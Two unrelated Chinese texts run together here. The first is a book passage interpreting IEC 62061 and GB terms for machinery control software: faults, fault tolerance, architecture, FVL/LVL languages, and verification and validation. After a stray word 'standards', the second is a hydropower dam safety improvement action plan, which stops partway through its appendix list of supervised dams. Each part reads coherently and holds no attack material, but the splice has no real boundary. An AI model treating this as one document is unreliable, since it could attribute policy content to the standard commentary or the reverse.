本书中重点阐述如何保证、评估机械/工业机器人控制系统软件部分达到需要的SIL,主要分为:按照软件的研发模型对生命周期各阶段的目标、输入文档、输出文档以及需求进行详细的描述;定义在不同的SIL情况下,软件研发过程中应采取的技术或方法,并对这些技术、方法进行解释。 A.7 故障、容错及失效 【IEC标准条款】 3.2.30 fault abnormal condition that may cause a reduction in or loss of,the capability of a SRECS,a subsystem,or a subsystem element to perform a required function. [IEC 61508-4,3.6.1 modified] 3.2.31 fault tolerance ability of a SRECS,a subsystem,or subsystem element to continue to perform a requiredfunction in the presence of faults or failures. [IEC 61508-4,3.6.3 modified] 3.2.39 failure termination of the ability of a SRECS,a subsystem,or a subsystem element to perform a required function. [IEC 61508-4,3.6.4 modified and ISO12100-1:2003,3.32] NOTE Failures are either random (in hardware) or systematic (in hardware or software). 【GB标准条款】 3.2.30 故障 指异常状态,该状态可能引起SRECS、子系统或子系统元素降低或丧失执行所要求功能的能力。 注:改写GB/T20438.4—2006,定义3.6.1。 3.2.31 容错 在出现故障或失效时,SRECS、子系统或子系统元素继续执行要求功能的能力。 注:改写GB/T20438.4—2006,定义3.6.3。 3.2.39 失效 SRECS、子系统或子系统元素执行要求功能的能力的终止。 注1:改写GB/T20438.4—2006,定义3.6.4和GB/T15706.1—2007,定义3.32。 注2:失效是随机的(硬件)或系统的(硬件或软件)。 1. 条款目的与意图 定义术语“故障”“容错”“失效”。 2. 条款解释与示例 故障是指异常状态,该状态可能引起SRECS、子系统或者子系统元素降低或丧失执行所要求功能的能力;失效是SRECS、子系统或子系统元素执行要求功能的能力的终止。在出现故障或失效时,SRECS、子系统或子系统元素继续执行要求功能的能力就是容错。硬件故障和容错措施在标准中已明确并具备可行性,下面重点解读软件故障、失效和软件容错。 (1)软件故障和失效。 引起软件失效或内部错误的异常状态称为软件故障。在大多数情况下,故障可被查出并排除。例如: ① 启动故障:程序不按要求启动。 ② 输入范围故障:程序不能正常检测输入数据范围。 ③ 说明故障:输入数据的约束范围说明模糊。 ④ 算法故障:计算给定数学方程的算法非正常执行。 ⑤ 边界故障:数组索引越界。 ⑥ 分时故障:分时源的必要连续性丢失、延迟或非正常处理。 简而言之,软件失效是最后结果与期望不相符或用户在软件系统边界察觉不到期望的软件故障行为。 (2)软件容错。 软件容错是软件系统所具有的生存特性,它使系统存在错误时仍具备继续向用户提供服务的能力。软件容错关心的是使系统能够容忍错误在软件开发后存在于软件中的所有必要方法。这些软件错误在系统运行时,可能会也可能不会再表现出来,但当它们表现出来时,软件容错技术应能给软件系统提供防止失效发生的必要机制。 在单版本软环境中(single-version),部分容忍软件设计错误的技术包括监控技术、操作元技术、决策确认技术和意外处理技术。为从激活的设计错误中完全恢复过来,可通过应用在系统中采用设计多样性(design diversity)开发的多版本软件(multiple version of software)来提供对软件设计错误的容错能力。其主要方法有恢复块技术(recovery blocks),N版程序设计技术(N-version programming)和N自检程序设计技术。 A.8 体系结构 【IEC标准条款】 3.2.35 architecture specific configuration of hardware and software elements in a SRECS. [IEC 61508-4,3.3.53.3.4 modified] 【GB标准条款】 3.2.35 体系结构 SRECS中硬件和软件元素的具体配置。 注:改写GB/T20438.4—2006,定义3.3.5。 1. 条款目的与意图 定义术语“体系结构”。 2. 条款解释与示例 体系结构是指SRECS中软/硬件元素的具体配置。体系结构是一系列相关的抽象模式,用于指导软件系统各个方面的设计。体系结构是一个系统的草图,描述的对象是直接构成系统的抽象组件,各个组件之间的连接则明确和相对细致地描述组件之间的交互。优秀的体系结构是降低成本、改进质量、支持按计划及时交付、按需求交付及降低风险的关键因素。 机械/工业机器人控制系统包括硬件设备和软件系统。目前的控制系统软件框架已不仅仅是简单的逻辑结构了,而是向通用软件架构靠拢。例如,现在一些软件标准化的技术已经应用到控制系统的构建中,包括Linux开放源码操作系统、面向对象软件工程、平台无关的Java编程语言、基于Web的信息发布等。 A.9 应用、嵌入式、安全相关软件 【IEC标准条款】 3.2.46 application software software specific to the application,that is implemented by the designer of the SRECS,generally containing logic sequences,limits and expressions that control the appropriate input,output,calculations,and decisions necessary to meet the SRECS functional requirements. 3.2.47 embedded software software,supplied by the manufacturer,that is part of the SRECS and that is not normally accessible for modification. NOTE Firmware and system software are examples of embedded software. 3.2.50 safety-related software software that is used to implement safety-related control functions in a safety-related system. 【GB标准条款】 3.2.46 应用软件 由SRECS设计人员研发的特定软件,一般包含逻辑流程图、限制条件以及用于控制适当输入、输出、计算和决定的表达式,以满足SRECS的功能要求。 3.2.47 嵌入式软件 软件,由制造商提供。该软件是SRECS的一部分,通常不能修改。 注:固件和系统软件为嵌入式软件的例子。 3.2.50 安全相关软件 在安全相关系统中,用于实现安全相关控制功能的软件。 1. 条款目的与意图 定义术语“应用软件”“嵌入式软件”“安全相关软件”。 2. 条款解释与示例 在IEC 62061标准中,应用软件指由SRECS设计人员研发的特定软件,包括逻辑流程图、限制条件以及用于控制适当输入、输出、计算和决定的表达式,以满足SRECS的功能要求。而嵌入式软件是由制造商提供的,属于SRECS的一部分,通常不能修改,如固件和系统软件。 典型的应用软件又称用户程序,是用户利用编程语言,根据控制要求编制的程序,以实现控制目的。随着技术的发展,为了增强控制器的运算、数据处理及通信等功能,编程语言已从传统的梯形图、逻辑图、语句表等低端编程语言发展为高级编程语言,如C语言、Pascal语言等,使用户可以像使用普通微型计算机一样操作控制系统,使控制功能得到更好的发挥。 嵌入式软件是由控制系统制造厂商设计编写的,并存入系统存储器中,用户不能直接读写与更改,包括固件和系统软件。系统软件一般包括系统诊断程序、输入处理程序、编译程序、信息传送程序、监控程序等。 安全相关软件是用于实现安全相关控制功能的软件,详见安全相关软件的条款解读。 A.10 全可变语言和有限可变语言 【IEC标准条款】 3.2.48 Full Variability Language,FVL type of language that provides the capability to implement a wide variety of functions and applications. [IEC 61511-1,3.2.81.1.3 modified] NOTE1 Typical example of systems using FVL are general-purpose computers. NOTE2 FVL is normally found in embedded software and is rarely used in application software. NOTE3 FVL examples include:Ada,C,Pascal,Instruction List,assembler languages,C++,Java,SQL. 3.2.49 Limited Variability Language,LVL type of language that provides the capability to combine predefined,application specific,library functions to implement the safety requirements specifications. [IEC 61511-1,3.2.81.1.2 modified] NOTE1 A LVL provides a close functional correspondence with the functions required to achieve the application. NOTE2 Typical examples of LVL are given in IEC 61131-3.They include ladder diagram,function block diagram and sequential function chart.Instruction lists and structured text are not considered to be LVL. NOTE3 Typical example of systems using LVL:Programmable Logic Controller (PLC) configured for machine control. 【GB标准条款】 3.2.48 全可变语言 语言的一种类型,可提供实现多种功能和应用的能力。 注1:改写GB/T21109.1—2007,定义3.2.81.1.3。 注2:使用FVL系统的典型例子是通用计算机。 注3:FVL通常用于嵌入式软件,很少用于应用软件。 注4:FVL例子包括:Ada、C、Pascal、指令表、汇编语言、C++、Java、SQL。 3.2.49 有限可变语言 语言的一种类型,为实现安全要求规范提供组合预定义的、应用特定的、库功能的能力。 注1:改写GB/T21109.1—2007,定义3.2.81.1.2。 注2:LVL提供与要求功能相一致的接近功能以获得应用。 注3:GB/T15969.3给出LVL的典型例子。它们包括梯形图、功能方块图和顺序功能图。LVL不考虑指令表和结构文本。 注4:使用LVL系统的典型例子:为机械控制配置的可编程逻辑控制器(PLC)。 1. 条款目的与意图 定义术语“全可变语言FVL”和“有限可变语言LVL”。 2. 条款解释与示例 全可变语言FVL是语言的一种类型,可提供实现多种功能和应用的能力。注意到注释中提到,一个使用FVL系统的典型例子是通用计算机,通常用于嵌入式软件,包括Ada、C、Pascal、指令表、汇编语言、C++、Java、SQL。 而有限可变语言LVL是为实现安全要求规范提供组合预定义的、应用特定的、库功能的能力,包括梯形图、功能方块图和顺序功能图。典型的例子包括为机械控制配置的可编程逻辑控制器(PLC)。 A.11 验证和确认 【IEC标准条款】 3.2.51 verification confirmation by examination (e.g.tests,analysis) that the SRECS,its subsystems or subsystem elements meet the requirements set by the relevant specification. [IEC 61508-4,3.8.1 modified and IEC 61511-1,3.2.92 modified] NOTE The verification results should provide documented objective evidence. EXAMPLE:Verification activities include: -reviews on outputs (documents from all phases) to ensure compliance with the objectives and requirements of the phase,taking into account the specific inputs to that phase; -design reviews; -tests performed on the designed products to ensure that they perform according to their specification; -integration tests performed where different parts of a system are put together in a step-by-step manner and by the performance of environmental tests to ensure that all the parts work together in the specified manner. 3.2.52 validation confirmation by examination (e.g.tests,analysis) that the SRECS meets the functional safety requirements of the specific application. [IEC 61508-4,3.8.2 modified] 【GB标准条款】 3.2.51 验证 通过检查(如测试、分析),证实SRECS、其子系统或子系统元素满足有关规范设定的要求。 注1:改写GB/T20438.4—2006,定义3.8.1和GB/T21109.1—2007,定义3.2.92, 注2:验证结果应提供证明文档作为客观性凭证。验证活动包括: ——对输出(各阶段文件)评审,保证符合该阶段的目标、要求,同时考虑该阶段的特定输入; ——设计评审; ——对设计产品进行测试,确保按照其相关规范执行; ——在系统的不同部分以逐步方式集成时,要进行整合测试,通过环境测试,确保所有部分以规定的方式协同工作。 3.2.52 确认 通过检查(如测试、分析)证实SRECS满足具体应用的功能安全要求。 注:改写GB/T 20438.42006,定义3.8.2。 1. 条款目的与意图 定义术语“验证”和“确认”。 2. 条款解释与示例 验证是指通过检查(如测试、分析),证实SRECS、子系统或子系统元素满足有关规定设定的要求。确认是指通过检查(如测试、分析)证实SRECS满足具体应用的功能安全要求。 首先,为什么要做软件验证和确认活动?尽管软件活动的每个阶段一般均经过严格的技术审查,以尽可能早地发现并纠正错误。但是,我们多年的软件质量保障经验表明,阶段审查并不能发现所有错误,新的活动还会引入新的错误。因此,软件是无法消除错误的,关键在于如何使程序中的错误密度达到尽可能低的程度,软件验证和确认活动就是为了这一目标而产生的。 软件验证和确认(Verification&Validation,V&V)工作是在整个软件生命周期中对软件的规范性评估活动,以保证软件开发各个环节的正确性。一般的软件验证与确认的活动模型如图A-2所示。 图A-2 一般的软件验证与确认的活动模型 验证和确认是两个相互独立但却相辅相成的活动,二者很容易混淆。软件验证试图证明在软件生存周期的各个阶段,软件产品或中间产品是否能够满足客户需求,包括逻辑协调性、完备性和正确性。软件确认是一系列的活动和过程,其目的是保证软件产品能够符合其描述的要求,包括需求规格说明的确认和程序的确认。总而言之,验证强调对过程的检验,确认强调对结果的检验。在软件功能安全的验证与确认过程中,可以使用软件审查和软件测试两种系统检查和分析技术。
standards
水电站大坝安全提升专项行动方案 为扎实开展水电站大坝(以下简称大坝)安全提升专项行动,提升大坝安全总体水平,特制订本方案。 一、指导思想 以习近平新时代中国特色社会主义思想为指导,深入学习贯彻党的二十大精神,统筹发展和安全,坚持人民至上、生命至上,认真落实党中央、国务院决策部署,深入分析研判本辖区、本单位大坝安全形势和挑战,制订落实有效工作举措,保障大坝运行安全和广大人民群众生命财产安全。 二、总体目标 进一步树牢安全发展理念,落实电力安全生产责任,健全大坝安全风险分级管控和隐患排查治理双重预防机制,整治风险隐患,堵塞管理漏洞,补齐工作短板,夯实大坝安全基础,增强大坝抵御灾害风险能力,提升大坝本质安全水平,防范遏制大坝安全事故发生,杜绝漫坝溃坝等重特大事故发生。 三、专项行动时间 自本方案印发之日起至2024年12月。 四、工作范围 按照《水电站大坝运行安全监督管理规定》(国家发展改革委令2015年第23号,以下简称发改委令第23号)纳入国家能源局监督管理范围的大坝(截至2023年1月的大坝清单见附件,本方案发布后新增大坝的信息随时向有关单位发布)。 五、重点任务 大坝运行单位、主管单位及其隶属的企业集团总部要认真对照法律法规、国家行业政策文件及技术标准规范规定要求,深入查摆大坝安全工作存在的问题和不足,制定落实改进举措。对照查摆的内容至少应包括以下8个方面、38项要求。 (一)深入学习贯彻习近平总书记关于安全生产重要论述和重要指示批示精神 1.及时收集习近平总书记关于安全生产重要论述和重要指示批示,第一时间在企业党组织会议、安委会会议、安全生产例会、班组安全活动等场合组织传达学习,深刻领会精神实质、实践要求,进一步树牢“安全第一”思想,不断提高对大坝安全极端重要性的认识。 2.做到“真学真懂真信真做”,结合本企业实际,研究制定有效贯彻举措,坚决将习近平总书记关于安全生产重要论述和重要指示批示精神落实到行动上和具体工作中,力戒学习和业务“两张皮”、贯彻落实措施“假大空”等形式主义。 (二)不断健全大坝安全责任体系 3.建立健全大坝安全责任制,明确企业安全生产第一责任人为大坝安全第一责任人,对大坝安全负全面责任;明确企业安全生产分管负责人,对大坝安全管理工作负直接领导责任;明确大坝安全技术负责人,对大坝运行、生产和技术工作实施指导和管理;明确企业相关部门、班组、专业管理岗位的责任,具体负责落实大坝安全相应工作任务。 4.电力企业根据工作需要,将大坝监测、检查、维护、消缺、技改、隐患整治等业务委托给相关专业技术单位开展的,按照“外包业务但不外包安全责任”的原则,大坝安全责任仍由电力企业承担。电力企业督促指导受委托单位认真落实大坝安全相应责任。 5.建立大坝安全责任落实监督考核机制,定期对责任落实情况开展检查评估,严格考核责任落实不到位、大坝安全工作不扎实、风险隐患整治不及时不彻底、发生事故事件的单位和人员,将考核结果与履职评定、职务职级晋升、薪资福利待遇等挂钩,真正落实安全生产“一票否决”制度要求。 (三)持续完善大坝安全组织机构 6.建立健全企业安委会,制定安委会及其办公室工作规则。企业主要负责人担任安委会主任并保证安委会正常运转,企业其他相关负责人和所属部门单位人员,以及长期外委协作单位人员纳入安委会组成。企业负责人和部门单位发生变化时,及时调整安委会组成。安委会的成立和调整以正式文件公开发布。安委会会议按照规定的频次、范围等要求召开,会议由安委会主任主持,研究解决重大安全问题,部署安排重大安全工作。会议形成纪要,印发给相关部门单位和人员,并抓好决议事项的落实。 7.不断完善大坝安全保证体系和监督体系,加强生产运行管理和安全监察监督部门建设,及时设置大坝安全工作需要的岗位,配齐配强大坝安全监测、水工、水务、电气、机械、金属结构、网络安全等专业人员。水电装机规模较大、大坝数量较多的电力企业应建立大坝管理中心或类似独立机构,并保证实体化运转,切实发挥其专业化管理和技术支撑作用。 8.不断完善大坝安全技术监督体系,建立技术监督组织机构和工作网络,配备技术监督力量,制定技术监督制度,明确技术监督职责,以安全和质量为根本目的,以落实标准规范为中心任务,以检测监测为主要手段,组织、指挥、协调大坝安全技术监督工作,保障技术监督工作正常开展。 (四)着力夯实大坝安全管理基础 9.大坝运行单位的主要负责人、分管负责人、技术负责人,以及生产运行管理部门、安全监察监督部门主要负责人等“关键少数”人员应具备大坝安全专业知识和管理能力,定期参加安全教育培训,并经考核合格后方可上岗。 10.企业主要负责人按照相关法律法规要求保证大坝安全投入,确保大坝日常运维、监测监控、消缺检修、技术改造、信息化建设、风险隐患整治等资金费用足额到位和专款专用。企业安全生产费用的提取、使用和管理严格执行《企业安全生产费用提取和使用管理办法》(财资〔2022〕136号)规定。企业应建立“绿色通道”,在遵守相关财会规定的基础上,优先、快速审批和拨付大坝重大风险隐患除险加固治理支出和危急情况下大坝安全重大突发事件应急处置必要的经费。 11.根据法律法规和国家行业标准规范要求并结合工作实际,建立健全企业大坝安全管理制度规程和技术标准体系,按照规定程序报经企业主要负责人审定批准后,列入企业现行有效制度清单,及时向所有从业人员公布,加强宣贯培训并督促严格执行。在法律法规和国家行业标准规范修订,以及本企业安全生产条件发生变化时,及时组织修订完善,并重新发布和宣贯培训。 12.加强大坝安全教育培训,按照法律法规和国家行业政策要求并结合本企业实际,在企业安全生产教育培训年度计划中,明确大坝运行各专业教育培训内容、学时、班次和参加人员范围,教育培训计划经企业主要负责人审定批准后公开发布并严格执行。每年底,对当年大坝安全教育培训成效进行分析,形成总结材料,与相关资料一并存档备查。 13.加强大坝安全信息化建设,纳入企业信息化建设整体规划,统筹推进,实现大坝信息系统与本企业其他相关系统互联互通。及时录入大坝设计施工基础数据、运行管理资料、水情雨情信息、监测监控信息等完整档案资料,并加强信息应用。认真执行《电力行业网络安全管理办法》(国能发安全规〔2022〕100号),将网络安全纳入安全生产工作范畴,扎实开展大坝安全信息系统网络安全工作。 14.加强大坝安全监测管理,认真做好监测系统运行维护工作,不得擅自停测封存、报废监测项目;规范开展数据采集和整编分析工作,对伪造监测数据的,按照瞒报安全生产信息严肃处理;专项梳理水工观测规程,根据最新技术标准规定和大坝安全实际,及时开展修订完善工作;对不满足技术标准规定的监测系统抓紧开展更新改造,改造工作原则上应于2023年底前完成;提升大坝安全监测自动化和实用化水平,结合在线监控系统建设,积极推进监测系统自动化改造,改造工作原则上应于2024年底前完成。 15.抓紧建立大坝安全在线监控系统,其中坝高100米以上的大坝、库容1亿立方米以上的大坝和病险坝的在线监控系统应于2024年底前建成并投入使用,系统的技术指标应满足《水电站大坝运行安全在线监控系统技术规范》(DL/T 2096—2020);其他大坝应于2024年底前具备在线监控功能,功能技术指标应满足国家能源局大坝安全监察中心(以下简称大坝中心)《关于加快推进水电站大坝安全在线监控系统建设的通知》(坝监信息〔2022〕97号)要求。尚未建立系统的大坝,运行单位和主管单位应制定建设工作计划,明确进度和责任,并于2023年6月1日前将工作计划报送大坝中心。 16.加强北斗卫星导航、遥感、人工智能等新技术在大坝安全领域的应用,加大对大坝安全技术装备研发、试点和推广应用等工作的投入和支持力度,重点推进土石坝、高陡边坡、滑坡体北斗高精度变形监测系统建设,基于北斗三号短报文的应急通讯技术和设备研发,强震等特殊情况下触发自动化监测研究应用,大坝安全智能管理试点等工作,努力提升大坝安全技术水平。 17.认真做好大坝安全信息报送工作,严格按照发改委令第23号和《水电站大坝运行安全信息报送办法》(国能安全〔2016〕261号)等规定要求,明确信息报送责任部门和人员,健全信息报送工作制度,畅通信息报送渠道,改进信息报送方式,及时、准确、全面报送大坝运行安全日常信息、年度报告及专题报告等,严肃处理瞒报、漏报、迟报的责任部门单位和人员。尚未实现监测信息自动报送的大坝,其运行单位和主管单位应抓紧对报送系统进行升级改造,并于2023年6月1日前报送升级改造工作计划,于2024年底前完成升级改造。 18.加强大坝现场(含危险区域、密闭空间等)安全管理,按照相关标准规范要求,辨识风险因素,设置警示标识标牌,落实防范防护措施。加强大坝治安保卫和暴恐袭击防范工作,严格按照《电力系统治安反恐防范要求第3部分:水力发电企业》(GA1800.3—2021),落实治安反恐“人防、物防、技防”措施,严防治安、暴恐事件危及大坝运行安全。 (五)加强防洪度汛和调度运用管理 19.健全水电站防汛组织机构,完善防汛工作制度,储备防汛物资;加强水情测报,提高洪水预报能力,流域梯级开发的水电站还应建立水情、泄洪等信息共享机制;优化泄洪闸门应急电源布局,根据需要增加闸门启闭装置供电回路,提高闸门启闭电源可靠性。 20.规范开展大坝防汛检查,实行以查组织、查工程、查预案、查物资、查通信为主要内容的分级检查制度,持续开展防汛检查,发现问题立即整改。其中,汛前应重点开展泄洪闸门启闭试验,检查闸门启闭电源、应急电源、启闭装置完好情况,开展腐蚀检测和无损探伤,并对闸门远程控制系统进行可靠性验证试验,必要时进行应力复核;检查防范水淹厂房措施落实情况;地质灾害高发区的大坝,还应对闸门和启闭装置采取必要的防护措施。 21.认真做好汛中应对和汛后恢复工作。汛中,落实企业领导带班和重要岗位24小时在岗值班制度,遇有灾害险情和突发事件,按规定权限和程序迅速启动响应妥善处置,严肃查处擅离职守问题。汛后,及时组织开展评估总结,统计损毁设备设施情况,抓紧开展抢险修复工作。 22.加强水电站水库调度运用管理,认真组织编制《水库年度汛期调度运用计划》,及时报请有审批权限的防洪调度机构审查批复,报送有管辖权的地方政府防汛指挥机构备案,调度运用计划一经批复,务必严格执行。在工程任务、水沙特性、运行情况等发生变化时,及时修订调度运用计划,并重新报批和备案。 23.严肃调度纪律,严格执行防洪调度机构、电力调度机构的实时调度指令,按照指令要求进行操作。对指令有异议的,可与相关机构沟通,但在接到新的指令前,仍应执行当前指令。遇有危及大坝安全的突发事件时,可以根据预案采取应急调度措施,但应及时向调度机构报告。严肃处理拒不执行调度指令、擅自超汛限水位运行等问题。 24.深刻汲取水库放水冲走下游河道游客事故教训,积极联系地方政府及其有关部门,推动建立水电站泄洪放水预警发布和协调联动机制,厘清各自管理范围和职责,共享风险隐患信息,明确警报预警发布范围、方式、流程等。参照《水电站泄洪预警广播系统技术规范》(DL/T2301—2021)等规定,于2023年底前建成投运泄水预警系统;建立企业内部泄洪放水预警工作制度,每次泄洪或放水前严格按照规定要求提前发布预警信息;泄洪或放水期间,加强对大坝工程管理范围内的巡视检查,并配合地方政府对上下游河道开展巡逻排查,遇有重大险情,立即按照相关预案执行。 25.严格执行《水库大坝安全管理条例》(国务院令第77号)、《电力设施保护条例》(国务院令第239号)等规定,及时发现并制止大坝管理和保护范围内的爆破、打井、采石、取土、挖沙等非法行为,联合地方政府整治库区网箱养殖、向库区和河道倾倒生产生活垃圾、在泄洪通道违章建筑等影响大坝安全的问题。大坝坝顶兼做公路的,严格履行论证和审批程序,并采取安全管理和维护措施。 (六)加强重要设备设施安全管理 26.加强水电站机电设备安全管理,定期梳理发电机组运行年限,评估机电设备运行状态,加强机电设备检修维护,开展调节保证计算和紧急停机方式复核,根据需要开展机组设备升级改造,提高机组运行的稳定性和机电设备的可靠性。复核电气设备雷击过电压、系统短路容量、保护装置整定值、接地电网完整性、跨步电势和解除电势指标等,检查“电气五防”、防小动物等措施落实情况,检查油变压器、互感器、蓄电池、电缆光缆等运行状态,消除火灾隐患。 27.开展输水系统安全鉴定,2018年以来未进行过安全鉴定的水电站,应于2024年汛前分别按照 《水工隧洞安全鉴定规程》(SL/T790—2020)和《压力钢管安全检测技术规程》(NB/T10349—2019)等规定,对输水系统的输水隧洞、压力钢管等过流承压设备开展一次安全性鉴定,及时发现并消除安全隐患。 (七)深入排查整治大坝安全问题 28.全面收集汇总水电站挡水和泄水建筑物、近坝库岸、工程边坡及附属设施的勘察设计、建设施工、安全鉴定、竣工验收等原始资料,梳理分析上述各阶段发现的工程质量和安全问题,尚未完成整改的原则上于2023年底前实现整改闭环。 29.专项梳理前次大坝安全注册检查、定期检查、特种检查,以及2018年以来历次年度详查发现的问题整改情况,严格按照整改计划明确的时限要求完成整改,实现问题闭环管理。 30.对安全注册等级为乙级和丙级的大坝,大坝运行单位和主管单位要深入排查大坝安全工作薄弱环节,认真分析原因,落实整改要求,快速提升大坝安全水平。大坝隶属的企业集团总部要对此类大坝实施重点管理,加强对大坝运行单位和主管单位的监督指导,督促及时补齐工作短板。 31.对2018年以来安全注册等级降级、连续2次以上注册等级为乙级的大坝,以及未按计划申请注册的备案大坝,其运行单位和主管单位要深挖问题根源,制定改进和加强大坝安全工作的计划,于2023年6月1日前报送国家能源局派出机构(以下简称派出机构)、大坝中心及所在地省级政府电力管理部门。大坝隶属的企业集团总部要对此类大坝实施挂牌督办,限期完成问题整改,于2023年6月1日前将挂牌督办通知、工作措施等报告国家能源局。 32.加强自然灾害风险管控,2020年以来未开展过自然灾害风险辨识评估的大坝,其运行单位和主管单位要在2023年主汛期前组织开展自然灾害风险辨识评估,根据评估结果落实整治管控措施。针对西藏昌都金沙江右岸白格滑坡体、青海拉西瓦果卜变形体等地质灾害,相关企业要立足于最极端情形,加强监测监控,及时掌握灾害最新变化情况,落实有效防范应对措施。 33.开展大坝抗震设计标准复查,2008年以来发生过坝址影响烈度为VII度及以上地震的大坝,应全面梳理区域构造稳定性研究、地震安全性评价、工程抗震分析、防震抗震专题研究论证、工程抗震设计审查等情况,认真复查工程抗震安全标准和抗震措施,对不满足《水电工程水工建筑物抗震设计规范》(NB35047—2015)规定要求的大坝及其附属建筑物(含泄洪闸门及其启闭机排架),及时采取管理措施和补强加固工程措施。 34.严格按照《水电站大坝工程隐患治理监督管理办法》(国能发安全规〔2022〕93号)等规定要求,持续排查整治大坝安全问题隐患,建立问题和措施“两个清单”,并实行动态管理。其中,构成较大及以上隐患的,立即报告派出机构、大坝中心、所在地的省级政府电力管理部门及有管辖权的地方政府防汛指挥机构。 (八)推进大坝安全应急能力建设 35.加强大坝安全应急能力建设评估工作,2018年以来未开展过评估的水电站,应于2023年底前按照《电力企业应急能力建设评估管理办法》(国能发安全〔2020〕66号)、《发电企业应急能力建设评估规范》(DL/T1919—2018)等相关规定,完成应急能力建设评估,形成评估报告,整改评估发现的问题。 36.严格按照《水电站大坝运行安全应急管理办法》(国能发安全规〔2022〕102号)规定要求,健全大坝安全应急组织体系,完善大坝安全应急工作机制和规章制度;健全大坝安全应急预案体系,于2023年底前完成大坝运行安全应急预案的制定、发布、实施及备案,预案的内容和深度应满足《水电站大坝运行安全应急预案编制导则》(DL/T1901—2018)要求,特别是要认真做好突发事件风险分析,绘制溃坝淹没图。企业应将应急预案与地方政府、流域管理机构的相关预案充分衔接,并制定应急演练年度计划,认真组织开展预案演练。 37.大坝运行单位和主管单位应深刻汲取近年来大坝险情应急处置工作暴露问题的教训,进一步加强应急资源保障。2023年底前,在现场配备卫星电话、北斗短报文终端等可靠的卫星通信设备,保障极端情况下的应急通讯;针对不同种类灾害险情,制定紧急撤离方案和逃生路线图,建立安全可靠的紧急逃生通道和应急避难场所。 38.建立健全应急协调联动机制,加强与国家有关监督管理部门、地方政府及其有关部门、上下游电站、周边企事业单位的联系沟通,及时获取和发布重大突发事件、极端灾害预警信息;积极参加地方政府、流域管理机构组织开展的应急演练,检验和提升应急处置能力;加强应急资源共享,与相关单位签订应急救援互助协议,在发生超出本企业应急救援能力范围的灾害险情后,及时提出支援请求,最大限度降低灾害险情对大坝安全的影响。 六、进度安排 专项行动分三个阶段进行。 (一)排查整治(本方案印发之日起至2023年12月31日)。各电力企业要对照法律法规和国家行业规定要求,深入排查大坝安全各类问题,建立问题和措施“两个清单”并动态管理,能够立即整改的要立行立改,不能立即整改的要制定工作计划,按时完成整改。整改期间要落实管控措施,防止风险隐患转化为事故。地方各级政府电力管理部门、各派出机构和大坝中心要跟踪督促电力企业扎实开展排查整治工作,大坝中心要加强对电力企业的技术指导。 (二)巩固提升(2024年1月1日至2024年9月30日)。各电力企业要系统梳理上一阶段发现问题的整改情况,对未完成整改的问题,加快整治步伐,确保闭环管理;对已完成整改的,及时开展“回头看”,防止问题反弹回潮。在排查整治的基础上,进一步理顺体制机制,完善规章制度,加强能力建设,提升大坝本质安全水平。地方各级政府电力管理部门、各派出机构和大坝中心要突出重点,指导帮助电力企业巩固提升专项行动成效。 (三)评估总结(2024年10月1日至12月31日)。各电力企业要对此次专项行动工作进行全面分析,总结经验成果,查摆问题不足,建立长效机制。各省级政府电力管理部门、各派出机构要及时总结本辖区专项行动开展情况。国家能源局将对专项行动开展情况进行汇总分析,发现工作亮点,梳理典型案例,适时在电力行业内通报。 七、保障措施 (一)缜密部署安排。各单位要高度重视、缜密部署,认真组织开展专项行动工作。全国电力安委会各企业成员单位要于2023年2月底前制定印发实施方案,细化分解集团总部、大坝主管单位、大坝运行单位等各层级任务,明确目标、时限、责任等工作要求;各省级电力管理部门、各派出机构要利用电力安委会、电力专委会等机制平台,及时将本方案传达到辖区内涉坝企业和市县级电力管理部门,并提出工作要求。对于全国电力安委会企业成员单位之外的地方企业,大坝主管单位及其隶属的企业集团总部与大坝不在同一个省份的,由大坝所在地的派出机构负责传达本方案内容,并提出工作要求。 (二)坚持目标导向。各单位要坚持以保障大坝安全为目标、以不发生涉坝重特大事故为底线,全面排查整治大坝安全各类问题,并追根溯源、找准病灶,针对性地在完善体制机制、健全规章制度、拧紧责任链条、强化技术保障、增强安全管理能力等方面出实招见实效,及时消除漏洞、补齐短板。 (三)加强监管执法。地方各级政府电力管理部门、各派出机构要跟踪了解辖区内电力企业专项行动开展情况,密切协同配合,加强监督管理,联合开展抽查检查、约谈通报等工作,根据部门职能和法定程序开展行政处罚,共同督促指导辖区内电力企业扎实开展专项行动工作,其中要将病险坝、乙丙级大坝、注册降级大坝、未按计划申请注册的备案大坝、存在较大以上风险隐患的大坝、注册检查和定期检查意见落实不到位的大坝等列为重点监管对象,实行全覆盖检查。大坝中心要加强技术支持和保障。国家能源局将视情选择部分电力企业开展督导检查。 2023年11月10日前,全国电力安委会各企业成员单位要汇总所属涉坝企业排查整治工作情况,形成阶段性总结,连同“两个清单”一并报送国家能源局;各省级电力管理部门、各派出机构要及时汇总辖区内涉坝企业和市县电力管理部门排查整治工作开展情况,形成阶段性总结,连同监督检查发现的问题清单和监管执法案件一并报送国家能源局。2024年11月10日前,全国电力安委会各企业成员单位、各省级电力管理部门及各派出机构要按照上述要求,向国家能源局报送专项行动整体工作总结。 附件:国家能源局监督管理的水电站大坝(截至2023年1月) 附件 国家能源局监督管理的水电站大坝 (截至2023年1月) 序号 大坝名称 省份 注册 状态 注册 等级 运行单位 主管单位 隶属集团 备注 1 落坡岭 北京 注册 甲级 永定河流域(北京)企业运营管理有限公司 永定河流域(北京)企业运营管理有限公司 地方企业 2 珠窝 北京 注册 甲级 永定河流域(北京)企业运营管理有限公司 永定河流域(北京)企业运营管理有限公司 地方企业 3 十三陵上池 北京 注册 甲级 国网新源控股有限公司北京十三陵蓄能电厂 国网新源控股有限公司 国家电网 4 丰宁上库坝 河北 备案 / 河北丰宁抽水蓄能有限公司 国网新源控股有限公司 国家电网 5 丰宁下库坝 河北 备案 / 河北丰宁抽水蓄能有限公司 国网新源控股有限公司 国家电网 6 潘家口下池 河北 注册 甲级 国网新源控股有限公司潘家口蓄能电厂 国网新源控股有限公司 国家电网 7 张河湾上库坝 河北 注册 甲级 河北张河湾蓄能发电有限责任公司 国网新源控股有限公司 国家电网 8 张河湾下库坝 河北 注册 甲级 河北张河湾蓄能发电有限责任公司 国网新源控股有限公司 国家电网 9 天桥 山西 注册 甲级 山西天桥水电有限公司 晋能控股电力集团清洁能源有限公司 地方企业 10 西龙池上库坝 山西 注册 甲级 山西西龙池抽水蓄能电站有限责任公司 国网新源控股有限公司 国家电网 11 西龙池下库坝 山西 注册 甲级 山西西龙池抽水蓄能电站有限责任公司 国网新源控股有限公司 国家电网 12 呼蓄上库坝 内蒙古 注册 甲级 内蒙古呼和浩特抽水蓄能发电有限责任公司 内蒙古电力(集团)有限责任公司 内蒙古电力公司 13 呼蓄下库坝 内蒙古 注册 甲级 